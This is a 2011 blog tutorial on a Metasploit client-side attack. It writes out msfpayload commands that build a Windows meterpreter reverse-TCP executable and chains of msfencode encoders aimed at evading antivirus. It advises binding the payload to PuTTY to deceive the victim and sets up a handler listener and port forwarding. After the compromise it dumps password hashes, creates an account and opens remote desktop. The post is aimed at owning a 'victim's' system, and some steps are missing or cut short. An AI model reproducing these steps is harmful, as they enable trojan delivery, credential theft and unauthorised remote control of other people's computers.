Monday, October 31, 2011

Metaspolit Framework tutorial -part 4(Client Side attack)

In this tutorial i will show basic metasploit client side attack .. In our case i will send a payload bound to an executable file, to the victim . if the victim opens the file the payload will be executed and it will give us backconnection to our meterpeter .

Type cd /pentest/exploits/framework in your terminal.

This is to navigate to the metasploit's folder . Ok to generate a payload , type the command .

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 x > /root/payload.exe

To get your wan ip address just go to

The windows/meterpreter/reverse_tcp is the payload we gonna use ,which will give us a tcp meterpreter session on execution..

Now you can see an executable file in your root folder named "payload.exe" ... now we have to send this executable to the victim ...
in our case i'm using a FUD binder to bind the payload with another executable file(i'm using putty a ssh client) to spoof the victim and to evade anti virus...

You can use any FUD binder or cypter but make sure you dont corrupt the file...
or you can even use metasploit's inbuilt crypter known as "msfencode" ...if you wish to use that, then your command will be

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | ruby msfencode -t exe -e x86/shikata_ga_nai > /root/payload.exe

but detected by AV's... well you can even use multiple encryption like this...

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

still detected by few AV's , or you can try using different combinations see the list of available encryptions type "msfencode -h".. if it doesn't work try Hex editing after encryption....

ok , before sending the file to the victime we need to setup a listener to receive the meterpreter session when victim executes the file ... for that open up the msfconsole ..since we were in metaploit folder just type


and then type

use exploit/multi/handler

for payload..type

set PAYLOAD windows/meterpreter/reverse_tcp

this time for LHOST use your LAN ip , type "ifconfig" in another terminal for the lan ip...
so command will be like ..



set LPORT 4444

ok done.. now type


thats it ,now our listener will listen for any incoming connections on port 4444 .

Dont forget to port forward the router on port "4444" to your "lan ip"
after port forwarding ,check your port using this website

okay , now our victim has executed the putty.exe (program bound to my payload) with in seconds our listener will give us a meterpreter session... that's it we own the system now....

now a simple hack using meterpreter..we will create a user account and enable remote desktop in victim's system ....
type "help" to see all the list of commands and their descriptions ..
type these commands to get thed system....

use priv


to check your privilege


to dump hashes type "hashdump"...just play around with all the commands ...

ok now we will enable the remote desktop on the victim's computer,for that

run getgui -u username -p password

now open up a new terminal and type the command..

rdesktop -u username -p password victim's-ip

if you wish to delete the user accounts after using the RDP ,

after you have done with it, type "exit" to exit the session...

ok for guys trying to test this within virtual box ...make sure you have a VPN installed (like hotspot shield) in the windows box...and remember for LHOST use your WAN ip for payload and lan ip for listener ... very important is that portforward your router to backtrack's LAN ip on port 4444...

..that's it,, a basic client side exploitation..
thanks for reading my tutorial !!!


Twitter Delicious Facebook Digg Stumbleupon Favorites More

Design by Vamshi krishnam raju | Bloggerized by Vamshi krishnam raju - Vamshi krishnam raju | Vamshi krishnam raju